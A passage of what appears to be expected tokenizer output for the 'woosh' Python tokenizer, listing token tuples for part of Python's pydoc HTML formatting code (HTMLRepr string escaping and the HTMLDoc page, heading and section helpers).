woosh.Token(woosh.NEWLINE, '\r\n', 533, 41, 534, 0),
woosh.Token(woosh.INDENT, ' ', 534, 0, 534, 16),
woosh.Token(woosh.NAME, 'return', 534, 16, 534, 22),
woosh.Token(woosh.NAME, 'getattr', 534, 23, 534, 30),
woosh.Token(woosh.OP, '(', 534, 30, 534, 31),
woosh.Token(woosh.NAME, 'self', 534, 31, 534, 35),
woosh.Token(woosh.OP, ',', 534, 35, 534, 36),
woosh.Token(woosh.NAME, 'methodname', 534, 37, 534, 47),
woosh.Token(woosh.OP, ')', 534, 47, 534, 48),
woosh.Token(woosh.OP, '(', 534, 48, 534, 49),
woosh.Token(woosh.NAME, 'x', 534, 49, 534, 50),
woosh.Token(woosh.OP, ',', 534, 50, 534, 51),
woosh.Token(woosh.NAME, 'level', 534, 52, 534, 57),
woosh.Token(woosh.OP, ')', 534, 57, 534, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 534, 58, 535, 0),
woosh.Token(woosh.DEDENT, ' ', 535, 0, 535, 8),
woosh.Token(woosh.DEDENT, '', 535, 8, 535, 8),
woosh.Token(woosh.NAME, 'return', 535, 8, 535, 14),
woosh.Token(woosh.NAME, 'self', 535, 15, 535, 19),
woosh.Token(woosh.OP, '.', 535, 19, 535, 20),
woosh.Token(woosh.NAME, 'escape', 535, 20, 535, 26),
woosh.Token(woosh.OP, '(', 535, 26, 535, 27),
woosh.Token(woosh.NAME, 'cram', 535, 27, 535, 31),
woosh.Token(woosh.OP, '(', 535, 31, 535, 32),
woosh.Token(woosh.NAME, 'stripid', 535, 32, 535, 39),
woosh.Token(woosh.OP, '(', 535, 39, 535, 40),
woosh.Token(woosh.NAME, 'repr', 535, 40, 535, 44),
woosh.Token(woosh.OP, '(', 535, 44, 535, 45),
woosh.Token(woosh.NAME, 'x', 535, 45, 535, 46),
woosh.Token(woosh.OP, ')', 535, 46, 535, 47),
woosh.Token(woosh.OP, ')', 535, 47, 535, 48),
woosh.Token(woosh.OP, ',', 535, 48, 535, 49),
woosh.Token(woosh.NAME, 'self', 535, 50, 535, 54),
woosh.Token(woosh.OP, '.', 535, 54, 535, 55),
woosh.Token(woosh.NAME, 'maxother', 535, 55, 535, 63),
woosh.Token(woosh.OP, ')', 535, 63, 535, 64),
woosh.Token(woosh.OP, ')', 535, 64, 535, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 535, 65, 536, 0),
woosh.Token(woosh.DEDENT, ' ', 537, 0, 537, 4),
woosh.Token(woosh.NAME, 'def', 537, 4, 537, 7),
woosh.Token(woosh.NAME, 'repr_string', 537, 8, 537, 19),
woosh.Token(woosh.OP, '(', 537, 19, 537, 20),
woosh.Token(woosh.NAME, 'self', 537, 20, 537, 24),
woosh.Token(woosh.OP, ',', 537, 24, 537, 25),
woosh.Token(woosh.NAME, 'x', 537, 26, 537, 27),
woosh.Token(woosh.OP, ',', 537, 27, 537, 28),
woosh.Token(woosh.NAME, 'level', 537, 29, 537, 34),
woosh.Token(woosh.OP, ')', 537, 34, 537, 35),
woosh.Token(woosh.OP, ':', 537, 35, 537, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 537, 36, 538, 0),
woosh.Token(woosh.INDENT, ' ', 538, 0, 538, 8),
woosh.Token(woosh.NAME, 'test', 538, 8, 538, 12),
woosh.Token(woosh.OP, '=', 538, 13, 538, 14),
woosh.Token(woosh.NAME, 'cram', 538, 15, 538, 19),
woosh.Token(woosh.OP, '(', 538, 19, 538, 20),
woosh.Token(woosh.NAME, 'x', 538, 20, 538, 21),
woosh.Token(woosh.OP, ',', 538, 21, 538, 22),
woosh.Token(woosh.NAME, 'self', 538, 23, 538, 27),
woosh.Token(woosh.OP, '.', 538, 27, 538, 28),
woosh.Token(woosh.NAME, 'maxstring', 538, 28, 538, 37),
woosh.Token(woosh.OP, ')', 538, 37, 538, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 538, 38, 539, 0),
woosh.Token(woosh.NAME, 'testrepr', 539, 8, 539, 16),
woosh.Token(woosh.OP, '=', 539, 17, 539, 18),
woosh.Token(woosh.NAME, 'repr', 539, 19, 539, 23),
woosh.Token(woosh.OP, '(', 539, 23, 539, 24),
woosh.Token(woosh.NAME, 'test', 539, 24, 539, 28),
woosh.Token(woosh.OP, ')', 539, 28, 539, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 539, 29, 540, 0),
woosh.Token(woosh.NAME, 'if', 540, 8, 540, 10),
woosh.Token(woosh.STRING, "'\\\\'", 540, 11, 540, 15),
woosh.Token(woosh.NAME, 'in', 540, 16, 540, 18),
woosh.Token(woosh.NAME, 'test', 540, 19, 540, 23),
woosh.Token(woosh.NAME, 'and', 540, 24, 540, 27),
woosh.Token(woosh.STRING, "'\\\\'", 540, 28, 540, 32),
woosh.Token(woosh.NAME, 'not', 540, 33, 540, 36),
woosh.Token(woosh.NAME, 'in', 540, 37, 540, 39),
woosh.Token(woosh.NAME, 'replace', 540, 40, 540, 47),
woosh.Token(woosh.OP, '(', 540, 47, 540, 48),
woosh.Token(woosh.NAME, 'testrepr', 540, 48, 540, 56),
woosh.Token(woosh.OP, ',', 540, 56, 540, 57),
woosh.Token(woosh.STRING, "r'\\\\'", 540, 58, 540, 63),
woosh.Token(woosh.OP, ',', 540, 63, 540, 64),
woosh.Token(woosh.STRING, "''", 540, 65, 540, 67),
woosh.Token(woosh.OP, ')', 540, 67, 540, 68),
woosh.Token(woosh.OP, ':', 540, 68, 540, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 540, 69, 541, 0),
woosh.Token(woosh.COMMENT, '# Backslashes are only literal in the string and are never', 541, 12, 541, 70),
woosh.Token(woosh.COMMENT, '# needed to make any special characters, so show a raw string.', 542, 12, 542, 74),
woosh.Token(woosh.INDENT, ' ', 543, 0, 543, 12),
woosh.Token(woosh.NAME, 'return', 543, 12, 543, 18),
woosh.Token(woosh.STRING, "'r'", 543, 19, 543, 22),
woosh.Token(woosh.OP, '+', 543, 23, 543, 24),
woosh.Token(woosh.NAME, 'testrepr', 543, 25, 543, 33),
woosh.Token(woosh.OP, '[', 543, 33, 543, 34),
woosh.Token(woosh.NUMBER, '0', 543, 34, 543, 35),
woosh.Token(woosh.OP, ']', 543, 35, 543, 36),
woosh.Token(woosh.OP, '+', 543, 37, 543, 38),
woosh.Token(woosh.NAME, 'self', 543, 39, 543, 43),
woosh.Token(woosh.OP, '.', 543, 43, 543, 44),
woosh.Token(woosh.NAME, 'escape', 543, 44, 543, 50),
woosh.Token(woosh.OP, '(', 543, 50, 543, 51),
woosh.Token(woosh.NAME, 'test', 543, 51, 543, 55),
woosh.Token(woosh.OP, ')', 543, 55, 543, 56),
woosh.Token(woosh.OP, '+', 543, 57, 543, 58),
woosh.Token(woosh.NAME, 'testrepr', 543, 59, 543, 67),
woosh.Token(woosh.OP, '[', 543, 67, 543, 68),
woosh.Token(woosh.NUMBER, '0', 543, 68, 543, 69),
woosh.Token(woosh.OP, ']', 543, 69, 543, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 543, 70, 544, 0),
woosh.Token(woosh.DEDENT, ' ', 544, 0, 544, 8),
woosh.Token(woosh.NAME, 'return', 544, 8, 544, 14),
woosh.Token(woosh.NAME, 're', 544, 15, 544, 17),
woosh.Token(woosh.OP, '.', 544, 17, 544, 18),
woosh.Token(woosh.NAME, 'sub', 544, 18, 544, 21),
woosh.Token(woosh.OP, '(', 544, 21, 544, 22),
woosh.Token(woosh.STRING, 'r\'((\\\\[\\\\abfnrtv\\\'"]|\\\\[0-9]..|\\\\x..|\\\\u....)+)\'', 544, 22, 544, 70),
woosh.Token(woosh.OP, ',', 544, 70, 544, 71),
woosh.Token(woosh.STRING, 'r\'<font color="#c040c0">\\1</font>\'', 545, 22, 545, 56),
woosh.Token(woosh.OP, ',', 545, 56, 545, 57),
woosh.Token(woosh.NAME, 'self', 546, 22, 546, 26),
woosh.Token(woosh.OP, '.', 546, 26, 546, 27),
woosh.Token(woosh.NAME, 'escape', 546, 27, 546, 33),
woosh.Token(woosh.OP, '(', 546, 33, 546, 34),
woosh.Token(woosh.NAME, 'testrepr', 546, 34, 546, 42),
woosh.Token(woosh.OP, ')', 546, 42, 546, 43),
woosh.Token(woosh.OP, ')', 546, 43, 546, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 546, 44, 547, 0),
woosh.Token(woosh.DEDENT, ' ', 548, 0, 548, 4),
woosh.Token(woosh.NAME, 'repr_str', 548, 4, 548, 12),
woosh.Token(woosh.OP, '=', 548, 13, 548, 14),
woosh.Token(woosh.NAME, 'repr_string', 548, 15, 548, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 548, 26, 549, 0),
woosh.Token(woosh.NAME, 'def', 550, 4, 550, 7),
woosh.Token(woosh.NAME, 'repr_instance', 550, 8, 550, 21),
woosh.Token(woosh.OP, '(', 550, 21, 550, 22),
woosh.Token(woosh.NAME, 'self', 550, 22, 550, 26),
woosh.Token(woosh.OP, ',', 550, 26, 550, 27),
woosh.Token(woosh.NAME, 'x', 550, 28, 550, 29),
woosh.Token(woosh.OP, ',', 550, 29, 550, 30),
woosh.Token(woosh.NAME, 'level', 550, 31, 550, 36),
woosh.Token(woosh.OP, ')', 550, 36, 550, 37),
woosh.Token(woosh.OP, ':', 550, 37, 550, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 550, 38, 551, 0),
woosh.Token(woosh.INDENT, ' ', 551, 0, 551, 8),
woosh.Token(woosh.NAME, 'try', 551, 8, 551, 11),
woosh.Token(woosh.OP, ':', 551, 11, 551, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 551, 12, 552, 0),
woosh.Token(woosh.INDENT, ' ', 552, 0, 552, 12),
woosh.Token(woosh.NAME, 'return', 552, 12, 552, 18),
woosh.Token(woosh.NAME, 'self', 552, 19, 552, 23),
woosh.Token(woosh.OP, '.', 552, 23, 552, 24),
woosh.Token(woosh.NAME, 'escape', 552, 24, 552, 30),
woosh.Token(woosh.OP, '(', 552, 30, 552, 31),
woosh.Token(woosh.NAME, 'cram', 552, 31, 552, 35),
woosh.Token(woosh.OP, '(', 552, 35, 552, 36),
woosh.Token(woosh.NAME, 'stripid', 552, 36, 552, 43),
woosh.Token(woosh.OP, '(', 552, 43, 552, 44),
woosh.Token(woosh.NAME, 'repr', 552, 44, 552, 48),
woosh.Token(woosh.OP, '(', 552, 48, 552, 49),
woosh.Token(woosh.NAME, 'x', 552, 49, 552, 50),
woosh.Token(woosh.OP, ')', 552, 50, 552, 51),
woosh.Token(woosh.OP, ')', 552, 51, 552, 52),
woosh.Token(woosh.OP, ',', 552, 52, 552, 53),
woosh.Token(woosh.NAME, 'self', 552, 54, 552, 58),
woosh.Token(woosh.OP, '.', 552, 58, 552, 59),
woosh.Token(woosh.NAME, 'maxstring', 552, 59, 552, 68),
woosh.Token(woosh.OP, ')', 552, 68, 552, 69),
woosh.Token(woosh.OP, ')', 552, 69, 552, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 552, 70, 553, 0),
woosh.Token(woosh.DEDENT, ' ', 553, 0, 553, 8),
woosh.Token(woosh.NAME, 'except', 553, 8, 553, 14),
woosh.Token(woosh.OP, ':', 553, 14, 553, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 553, 15, 554, 0),
woosh.Token(woosh.INDENT, ' ', 554, 0, 554, 12),
woosh.Token(woosh.NAME, 'return', 554, 12, 554, 18),
woosh.Token(woosh.NAME, 'self', 554, 19, 554, 23),
woosh.Token(woosh.OP, '.', 554, 23, 554, 24),
woosh.Token(woosh.NAME, 'escape', 554, 24, 554, 30),
woosh.Token(woosh.OP, '(', 554, 30, 554, 31),
woosh.Token(woosh.STRING, "'<%s instance>'", 554, 31, 554, 46),
woosh.Token(woosh.OP, '%', 554, 47, 554, 48),
woosh.Token(woosh.NAME, 'x', 554, 49, 554, 50),
woosh.Token(woosh.OP, '.', 554, 50, 554, 51),
woosh.Token(woosh.NAME, '__class__', 554, 51, 554, 60),
woosh.Token(woosh.OP, '.', 554, 60, 554, 61),
woosh.Token(woosh.NAME, '__name__', 554, 61, 554, 69),
woosh.Token(woosh.OP, ')', 554, 69, 554, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 554, 70, 555, 0),
woosh.Token(woosh.DEDENT, ' ', 556, 0, 556, 4),
woosh.Token(woosh.DEDENT, '', 556, 4, 556, 4),
woosh.Token(woosh.NAME, 'repr_unicode', 556, 4, 556, 16),
woosh.Token(woosh.OP, '=', 556, 17, 556, 18),
woosh.Token(woosh.NAME, 'repr_string', 556, 19, 556, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 556, 30, 557, 0),
woosh.Token(woosh.DEDENT, '', 558, 0, 558, 0),
woosh.Token(woosh.NAME, 'class', 558, 0, 558, 5),
woosh.Token(woosh.NAME, 'HTMLDoc', 558, 6, 558, 13),
woosh.Token(woosh.OP, '(', 558, 13, 558, 14),
woosh.Token(woosh.NAME, 'Doc', 558, 14, 558, 17),
woosh.Token(woosh.OP, ')', 558, 17, 558, 18),
woosh.Token(woosh.OP, ':', 558, 18, 558, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 558, 19, 559, 0),
woosh.Token(woosh.INDENT, ' ', 559, 0, 559, 4),
woosh.Token(woosh.STRING, '"""Formatter class for HTML documentation."""', 559, 4, 559, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 559, 49, 560, 0),
woosh.Token(woosh.COMMENT, '# ------------------------------------------- HTML formatting utilities', 561, 4, 561, 75),
woosh.Token(woosh.NAME, '_repr_instance', 563, 4, 563, 18),
woosh.Token(woosh.OP, '=', 563, 19, 563, 20),
woosh.Token(woosh.NAME, 'HTMLRepr', 563, 21, 563, 29),
woosh.Token(woosh.OP, '(', 563, 29, 563, 30),
woosh.Token(woosh.OP, ')', 563, 30, 563, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 563, 31, 564, 0),
woosh.Token(woosh.NAME, 'repr', 564, 4, 564, 8),
woosh.Token(woosh.OP, '=', 564, 9, 564, 10),
woosh.Token(woosh.NAME, '_repr_instance', 564, 11, 564, 25),
woosh.Token(woosh.OP, '.', 564, 25, 564, 26),
woosh.Token(woosh.NAME, 'repr', 564, 26, 564, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 564, 30, 565, 0),
woosh.Token(woosh.NAME, 'escape', 565, 4, 565, 10),
woosh.Token(woosh.OP, '=', 565, 11, 565, 12),
woosh.Token(woosh.NAME, '_repr_instance', 565, 13, 565, 27),
woosh.Token(woosh.OP, '.', 565, 27, 565, 28),
woosh.Token(woosh.NAME, 'escape', 565, 28, 565, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 565, 34, 566, 0),
woosh.Token(woosh.NAME, 'def', 567, 4, 567, 7),
woosh.Token(woosh.NAME, 'page', 567, 8, 567, 12),
woosh.Token(woosh.OP, '(', 567, 12, 567, 13),
woosh.Token(woosh.NAME, 'self', 567, 13, 567, 17),
woosh.Token(woosh.OP, ',', 567, 17, 567, 18),
woosh.Token(woosh.NAME, 'title', 567, 19, 567, 24),
woosh.Token(woosh.OP, ',', 567, 24, 567, 25),
woosh.Token(woosh.NAME, 'contents', 567, 26, 567, 34),
woosh.Token(woosh.OP, ')', 567, 34, 567, 35),
woosh.Token(woosh.OP, ':', 567, 35, 567, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 567, 36, 568, 0),
woosh.Token(woosh.INDENT, ' ', 568, 0, 568, 8),
woosh.Token(woosh.STRING, '"""Format an HTML page."""', 568, 8, 568, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 568, 34, 569, 0),
woosh.Token(woosh.NAME, 'return', 569, 8, 569, 14),
woosh.Token(woosh.STRING, '\'\'\'\\\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\r\n<html><head><title>Python: %s</title>\r\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8">\r\n</head><body bgcolor="#f0f0f8">\r\n%s\r\n</body></html>\'\'\'', 569, 15, 575, 17),
woosh.Token(woosh.OP, '%', 575, 18, 575, 19),
woosh.Token(woosh.OP, '(', 575, 20, 575, 21),
woosh.Token(woosh.NAME, 'title', 575, 21, 575, 26),
woosh.Token(woosh.OP, ',', 575, 26, 575, 27),
woosh.Token(woosh.NAME, 'contents', 575, 28, 575, 36),
woosh.Token(woosh.OP, ')', 575, 36, 575, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 575, 37, 576, 0),
woosh.Token(woosh.DEDENT, ' ', 577, 0, 577, 4),
woosh.Token(woosh.NAME, 'def', 577, 4, 577, 7),
woosh.Token(woosh.NAME, 'heading', 577, 8, 577, 15),
woosh.Token(woosh.OP, '(', 577, 15, 577, 16),
woosh.Token(woosh.NAME, 'self', 577, 16, 577, 20),
woosh.Token(woosh.OP, ',', 577, 20, 577, 21),
woosh.Token(woosh.NAME, 'title', 577, 22, 577, 27),
woosh.Token(woosh.OP, ',', 577, 27, 577, 28),
woosh.Token(woosh.NAME, 'fgcol', 577, 29, 577, 34),
woosh.Token(woosh.OP, ',', 577, 34, 577, 35),
woosh.Token(woosh.NAME, 'bgcol', 577, 36, 577, 41),
woosh.Token(woosh.OP, ',', 577, 41, 577, 42),
woosh.Token(woosh.NAME, 'extras', 577, 43, 577, 49),
woosh.Token(woosh.OP, '=', 577, 49, 577, 50),
woosh.Token(woosh.STRING, "''", 577, 50, 577, 52),
woosh.Token(woosh.OP, ')', 577, 52, 577, 53),
woosh.Token(woosh.OP, ':', 577, 53, 577, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 577, 54, 578, 0),
woosh.Token(woosh.INDENT, ' ', 578, 0, 578, 8),
woosh.Token(woosh.STRING, '"""Format a page heading."""', 578, 8, 578, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 578, 36, 579, 0),
woosh.Token(woosh.NAME, 'return', 579, 8, 579, 14),
woosh.Token(woosh.STRING, '\'\'\'\r\n<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">\r\n<tr bgcolor="%s">\r\n<td valign=bottom> <br>\r\n<font color="%s" face="helvetica, arial"> <br>%s</font></td\r\n><td align=right valign=bottom\r\n><font color="%s" face="helvetica, arial">%s</font></td></tr></table>\r\n \'\'\'', 579, 15, 586, 7),
woosh.Token(woosh.OP, '%', 586, 8, 586, 9),
woosh.Token(woosh.OP, '(', 586, 10, 586, 11),
woosh.Token(woosh.NAME, 'bgcol', 586, 11, 586, 16),
woosh.Token(woosh.OP, ',', 586, 16, 586, 17),
woosh.Token(woosh.NAME, 'fgcol', 586, 18, 586, 23),
woosh.Token(woosh.OP, ',', 586, 23, 586, 24),
woosh.Token(woosh.NAME, 'title', 586, 25, 586, 30),
woosh.Token(woosh.OP, ',', 586, 30, 586, 31),
woosh.Token(woosh.NAME, 'fgcol', 586, 32, 586, 37),
woosh.Token(woosh.OP, ',', 586, 37, 586, 38),
woosh.Token(woosh.NAME, 'extras', 586, 39, 586, 45),
woosh.Token(woosh.NAME, 'or', 586, 46, 586, 48),
woosh.Token(woosh.STRING, "' '", 586, 49, 586, 57),
woosh.Token(woosh.OP, ')', 586, 57, 586, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 586, 58, 587, 0),
woosh.Token(woosh.DEDENT, ' ', 588, 0, 588, 4),
woosh.Token(woosh.NAME, 'def', 588, 4, 588, 7),
woosh.Token(woosh.NAME, 'section', 588, 8, 588, 15),
woosh.Token(woosh.OP, '(', 588, 15, 588, 16),
woosh.Token(woosh.NAME, 'self', 588, 16, 588, 20),
woosh.Token(woosh.OP, ',', 588, 20, 588, 21),
woosh.Token(woosh.NAME, 'title', 588, 22, 588, 27),
woosh.Token(woosh.OP, ',', 588, 27, 588, 28),
woosh.Token(woosh.NAME, 'fgcol', 588, 29, 588, 34),
woosh.Token(woosh.OP, ',', 588, 34, 588, 35),
woosh.Token(woosh.NAME, 'bgcol', 588, 36, 588, 41),
woosh.Token(woosh.OP, ',', 588, 41, 588, 42),
woosh.Token(woosh.NAME, 'contents', 588, 43, 588, 51),
woosh.Token(woosh.OP, ',', 588, 51, 588, 52),
woosh.Token(woosh.NAME, 'width', 588, 53, 588, 58),
woosh.Token(woosh.OP, '=', 588, 58, 588, 59),
woosh.Token(woosh.NUMBER, '6', 588, 59, 588, 60),
woosh.Token(woosh.OP, ',', 588, 60, 588, 61),
woosh.Token(woosh.NAME, 'prelude', 589, 16, 589, 23),
woosh.Token(woosh.OP, '=', 589, 23, 589, 24),
woosh.Token(woosh.STRING, "''", 589, 24, 589, 26),
woosh.Token(woosh.OP, ',', 589, 26, 589, 27),
woosh.Token(woosh.NAME, 'marginalia', 589, 28, 589, 38),
woosh.Token(woosh.OP, '=', 589, 38, 589, 39),
woosh.Token(woosh.NAME, 'None', 589, 39, 589, 43),
woosh.Token(woosh.OP, ',', 589, 43, 589, 44),
woosh.Token(woosh.NAME, 'gap', 589, 45, 589, 48),
woosh.Token(woosh.OP, '=', 589, 48, 589, 49),
woosh.Token(woosh.STRING, "' '", 589, 49, 589, 57),
woosh.Token(woosh.OP, ')', 589, 57, 589, 58),
woosh.Token(woosh.OP, ':', 589, 58, 589, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 589, 59, 590, 0),
woosh.Token(woosh.INDENT, ' ', 590, 0, 590, 8),
woosh.Token(woosh.STRING, '"""Format a section with a heading."""', 590, 8, 590, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 590, 46, 591, 0),
woosh.Token(woosh.NAME, 'if', 591, 8, 591, 10),
woosh.Token(woosh.NAME, 'marginalia', 591, 11, 591, 21),
woosh.Token(woosh.NAME, 'is', 591, 22, 591, 24),
woosh.Token(woosh.NAME, 'None', 591, 25, 591, 29),
woosh.Token(woosh.OP, ':', 591, 29, 591, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 591, 30, 592, 0),
woosh.Token(woosh.INDENT, ' ', 592, 0, 592, 12),
woosh.Token(woosh.NAME, 'marginalia', 592, 12, 592, 22),
woosh.Token(woosh.OP, '=', 592, 23, 592, 24),
woosh.Token(woosh.STRING, "'<tt>'", 592, 25, 592, 31),
woosh.Token(woosh.OP, '+', 592, 32, 592, 33),
woosh.Token(woosh.STRING, "' '", 592, 34, 592, 42),
woosh.Token(woosh.OP, '*', 592, 43, 592, 44),
woosh.Token(woosh.NAME, 'width', 592, 45, 592, 50),
woosh.Token(woosh.OP, '+', 592, 51, 592, 52),
woosh.Token(woosh.STRING, "'</tt>'", 592, 53, 592, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 592, 60, 593, 0),
woosh.Token(woosh.DEDENT, ' ', 593, 0, 593, 8),
woosh.Token(woosh.NAME, 'result', 593, 8, 593, 14),
woosh.Token(woosh.OP, '=', 593, 15, 593, 16),
woosh.Token(woosh.STRING, '\'\'\'<p>\r\n<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">\r\n<tr bgcolor="%s">\r\n<td colspan=3 valign=bottom> <br>\r\n<font color="%s" face="helvetica, arial">%s</font></td></tr>\r\n \'\'\'', 593, 17, 598, 7),
woosh.Token(woosh.OP, '%', 598, 8, 598, 9),
woosh.Token(woosh.OP, '(', 598, 10, 598, 11),
woosh.Token(woosh.NAME, 'bgcol', 598, 11, 598, 16),
woosh.Token(woosh.OP, ',', 598, 16, 598, 17),
woosh.Token(woosh.NAME, 'fgcol', 598, 18, 598, 23),
woosh.Token(woosh.OP, ',', 598, 23, 598, 24),
woosh.Token(woosh.NAME, 'title', 598, 25, 598, 30),
woosh.Token(woosh.OP, ')', 598, 30, 598, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 598, 31, 599, 0),
woosh.Token(woosh.NAME, 'if', 599, 8, 599, 10),
woosh.Token(woosh.NAME, 'prelude', 599, 11, 599, 18),
woosh.Token(woosh.OP, ':', 599, 18, 599, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 599, 19, 600, 0),
woosh.Token(woosh.INDENT, ' ', 600, 0, 600, 12),
woosh.Token(woosh.NAME, 'result', 600, 12, 600, 18),
woosh.Token(woosh.OP, '=', 600, 19, 600, 20),
woosh.Token(woosh.NAME, 'result', 600, 21, 600, 27),
woosh.Token(woosh.OP, '+', 600, 28, 600, 29),
woosh.Token(woosh.STRING, '\'\'\'\r\n<tr bgcolor="%s"><td rowspan=2>%s</td>\r\n<td colspan=2>%s</td></tr>\r\n<tr><td>%s</td>\'\'\'', 600, 30, 603, 18),
woosh.Token(woosh.OP, '%', 603, 19, 603, 20),
woosh.Token(woosh.OP, '(', 603, 21, 603, 22),
woosh.Token(woosh.NAME, 'bgcol', 603, 22, 603, 27),
woosh.Token(woosh.OP, ',', 603, 27, 603, 28),
woosh.Token(woosh.NAME, 'marginalia', 603, 29, 603, 39),
woosh.Token(woosh.OP, ',', 603, 39, 603, 40),
woosh.Token(woosh.NAME, 'prelude', 603, 41, 603, 48),
woosh.Token(woosh.OP, ',', 603, 48, 603, 49),
woosh.Token(woosh.NAME, 'gap', 603, 50, 603, 53),
woosh.Token(woosh.OP, ')', 603, 53, 603, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 603, 54, 604, 0),
woosh.Token(woosh.DEDENT, ' ', 604, 0, 604, 8),
woosh.Token(woosh.NAME, 'else', 604, 8, 604, 12),
woosh.Token(woosh.OP, ':', 604, 12, 604, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 604, 13, 605, 0),
woosh.Token(woosh.INDENT, ' ', 605, 0, 605, 12),
woosh.Token(woosh.NAME, 'result', 605, 12, 605, 18),
woosh.Token(woosh.OP, '=', 605, 19, 605, 20),
woosh.Token(woosh.NAME, 'result', 605, 21, 605, 27),
woosh.Token(woosh.OP, '+', 605, 28, 605, 29),
woosh.Token(woosh.STRING, '\'\'\'\r\n<tr><td bgcolor="%s">%s</td><td>%s</td>\'\'\'', 605, 30, 606, 42),
woosh.Token(woosh.OP, '%', 606, 43, 606, 44),
woosh.Token(woosh.OP, '(', 606, 45, 606, 46),
woosh.Token(woosh.NAME, 'bgcol', 606, 46, 606, 51),
woosh.Token(woosh.OP, ',', 606, 51, 606, 52),
woosh.Token(woosh.NAME, 'marginalia', 606, 53, 606, 63),
woosh.Token(woosh.OP, ',', 606, 63, 606, 64),
woosh.Token(woosh.NAME, 'gap', 606, 65, 606, 68),
woosh.Token(woosh.OP, ')', 606, 68, 606, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 606, 69, 607, 0),
woosh.Token(woosh.DEDENT, ' ', 608, 0, 608, 8),
woosh.Token(woosh.NAME, 'return', 608, 8, 608, 14),
woosh.Token(woosh.NAME, 'result', 608, 15, 608, 21),
woosh.Token(woosh.OP, '+', 608, 22, 608, 23),
woosh.Token(woosh.STRING, '\'\\n<td width="100%%">%s</td></tr></table>\'', 608, 24, 608, 66),
woosh.Token(woosh.OP, '%', 608, 67, 608, 68),
woosh.Token(woosh.NAME, 'contents', 608, 69, 608, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 608, 77, 609, 0),
woosh.Token(woosh.DEDENT, ' ', 610, 0, 610, 4),
woosh.Token(woosh.NAME, 'def', 610, 4, 610, 7),
woosh.Token(woosh.NAME, 'bigsection', 610, 8, 610, 18),
woosh.Token(woosh.OP, '(', 610, 18, 610, 19),
woosh.Token(woosh.NAME, 'self', 610, 19, 610, 23),
woosh.Token(woosh.OP, ',', 610, 23, 610, 24),
woosh.Token(woosh.NAME, 'title', 610, 25, 610, 30),
woosh.Token(woosh.OP, ',', 610, 30, 610, 31),
woosh.Token(woosh.OP, '*', 610, 32, 610, 33),
woosh.Token(woosh.NAME, 'args', 610, 33, 610, 37),
woosh.Token(woosh.OP, ')', 610, 37, 610, 38),
woosh.Token(woosh.OP, ':', 610, 38, 610, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 610, 39, 611, 0),
woosh.Token(woosh.INDENT, ' ', 611, 0, 611, 8),
woosh.Token(woosh.STRING, '"""Format a section with a big heading."""', 611, 8, 611, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 611, 50, 612, 0),
woosh.Token(woosh.NAME, 'title', 612, 8, 612, 13),
woosh.Token(woosh.OP, '=', 612, 14, 612, 15),
woosh.Token(woosh.STRING, "'<big><strong>%s</strong></big>'", 612, 16, 612, 48),
woosh.Token(woosh.OP, '%', 612, 49, 612, 50),
woosh.Token(woosh.NAME, 'title', 612, 51, 612, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 612, 56, 613, 0),
woosh.Token(woosh.NAME, 'return', 613, 8, 613, 14),
woosh.Token(woosh.NAME, 'self', 613, 15, 613, 19),
woosh.Token(woosh.OP, '.', 613, 19, 613, 20),
woosh.Token(woosh.NAME, 'section', 613, 20, 613, 27),
woosh.Token(woosh.OP, '(', 613, 27, 613, 28),
woosh.Token(woosh.NAME, 'title', 613, 28, 613, 33),
woosh.Token(woosh.OP, ',', 613, 33, 613, 34),
woosh.Token(woosh.OP, '*', 613, 35, 613, 36),
woosh.Token(woosh.NAME, 'args', 613, 36, 613, 40),
woosh.Token(woosh.OP, ')', 613, 40, 613, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 613, 41, 614, 0),
woosh.Token(woosh.DEDENT, ' ', 615, 0, 615, 4),
woosh.Token(woosh.NAME, 'def', 615, 4, 615, 7),
woosh.Token(woosh.NAME, 'preformat', 615, 8, 615, 17),
woosh.Token(woosh.OP, '(', 615, 17, 615, 18),
woosh.Token(woosh.NAME, 'self', 615, 18, 615, 22),
woosh.Token(woosh.OP, ',', 615, 22, 615, 23),
woosh.Token(woosh.NAME, 'text', 615, 24, 615, 28),
woosh.Token(woosh.OP, ')', 615, 28, 615, 29),
woosh.Token(woosh.OP, ':', 615, 29, 615, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 615, 30, 616, 0),
